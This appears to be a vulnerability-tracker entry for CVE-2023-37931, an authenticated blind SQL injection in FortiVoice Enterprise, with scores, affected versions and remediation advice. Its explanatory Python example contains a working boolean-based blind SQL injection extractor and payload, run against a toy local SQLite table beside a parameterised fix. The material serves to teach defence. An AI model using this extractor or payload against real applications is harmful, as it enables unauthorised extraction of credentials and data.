Cyber Posture

CVE-2023-37931

High

Published: 14 January 2025

Modified: 22 July 2025
KEV Added: (none listed)
Patch: (none listed)
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0044 (63.0th percentile)
Risk Priority: 18 (weighting: 60% EPSS, 20% KEV, 20% CVSS)

Description

An improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability [CWE-89] in FortiVoice Enterprise version 7.0.0 through 7.0.1 and before 6.4.8 allows an authenticated attacker to perform a blind SQL injection attack via sending crafted HTTP or HTTPS requests.

Security Summary

CVE-2023-37931 is a SQL injection vulnerability (CWE-89) in FortiVoice Enterprise versions 7.0.0 through 7.0.1 and versions before 6.4.8. The flaw is improper neutralization of special elements used in an SQL command: request parameters reach an SQL statement without being separated from its syntax, so an authenticated attacker can perform a blind SQL injection by sending crafted HTTP or HTTPS requests. It carries a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), a High rating driven by the full confidentiality, integrity and availability impact.

An attacker needs only a low-privileged authenticated account (PR:L) and network reachability (AV:N); attack complexity is low and no user interaction is required. Because the injection is blind, the application never returns query output directly: the attacker infers it from observable differences in the response (a true/false condition or a time delay), typically one bit per request, so reading out data means a large volume of near-identical authenticated requests. That volume is the detection opportunity, but it does not reduce the impact: the vector rates confidentiality, integrity and availability all high (C:H/I:H/A:H), covering data extraction, modification of database contents and disruption of the service.
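The attack pattern described above, as an added illustration that is not FortiVoice code and is not taken from the advisory: a toy account-lookup handler backed by SQLite, written once in the vulnerable form (parameter spliced into the SQL text) and once hardened with a bound parameter, plus a boolean-based blind extractor that recovers a secret one bit per request through the vulnerable handler and recovers nothing through the hardened one. The `users` table, its columns, the sample rows and the secret value are all constructed for this example.

```python
import sqlite3
from typing import Callable

# Constructed sample data for a toy "does this account exist?" lookup.
# This module is an added illustration of CWE-89 blind SQL injection;
# it is not FortiVoice code, and the table, columns and secret are assumptions.
SAMPLE_ROWS = [
    ("admin", "s3cret"),
    ("alice", "hunter2"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return db


def vulnerable_user_exists(db: sqlite3.Connection, username: str) -> bool:
    """Vulnerable lookup: the request parameter is spliced into the SQL text.

    The caller learns only whether some row matched (think 200 vs 404).
    That single bit is all a blind injection needs.
    """
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchone() is not None


def safe_user_exists(db: sqlite3.Connection, username: str) -> bool:
    """Hardened lookup: same query, value bound as a parameter.

    Quotes, OR, comments and subqueries in the input are now compared as a
    literal string and can no longer change the statement's structure.
    """
    sql = "SELECT 1 FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None


def blind_extract(
    oracle: Callable[[str], bool], column: str, target_user: str, max_len: int = 64
) -> tuple[str, int]:
    """Boolean-based blind extraction of `column` for `target_user`.

    `oracle(value)` returns the application's one-bit answer for a request
    carrying `value` as the username. Each character is recovered by a
    binary search over its code point (7 requests for 7-bit ASCII).
    Returns (recovered value, number of requests issued) so the cost and
    noisiness of the attack are visible.
    """
    requests = 0
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Closes the string literal, ORs in a subquery that compares one
            # character's code point against `mid`, and comments out the rest.
            # Past the end of the value substr() yields '' and unicode('') is
            # NULL, so every comparison is false and the search collapses to 0.
            payload = (
                f"x' OR (SELECT unicode(substr({column}, {pos}, 1)) "
                f"FROM users WHERE username = '{target_user}') > {mid} -- "
            )
            requests += 1
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # end of the value reached
        recovered += chr(lo)
    return recovered, requests


def demo() -> dict:
    """Run the extractor against both handlers and report what each leaks."""
    db = make_db()
    leaked, cost = blind_extract(lambda v: vulnerable_user_exists(db, v), "password", "admin")
    blocked, cost_safe = blind_extract(lambda v: safe_user_exists(db, v), "password", "admin")
    return {
        "vulnerable_leaks": leaked,      # 's3cret'
        "vulnerable_requests": cost,     # 49: 7 per character plus 7 to detect the end
        "hardened_leaks": blocked,       # ''
        "hardened_requests": cost_safe,  # 7: the search collapses at the first character
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

`demo()` makes the practitioner-relevant numbers visible: 49 near-identical authenticated requests to recover a six-character value, which is why a blind injection against an admin-facing web interface is loud in access logs even when nothing unusual shows up in the responses. Against the hardened handler every payload is compared as a literal username, so the first binary search collapses to zero and the loop stops after 7 requests with nothing recovered.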

The vendor's FortiGuard PSIRT advisory FG-IR-23-220 (https://fortiguard.com/psirt/FG-IR-23-220) is the authoritative source for affected and fixed versions; upgrade to the release it lists for each branch. Until that is done, the PR:L requirement means exposure is bounded by who holds a valid account on the FortiVoice web interface, so review those accounts and restrict network access to the administrative interface.

Details

CWE(s)
CWE-89

Affected Products

Vendor: fortinet
Product: fortivoice
Version ranges: 6.0.0 — 6.4.9 · 7.0.0 — 7.0.2

These ranges reach past the versions named in the description (7.0.0 through 7.0.1, and releases before 6.4.8), so confirm the exact fixed build for each branch against FG-IR-23-220 before closing the finding.

References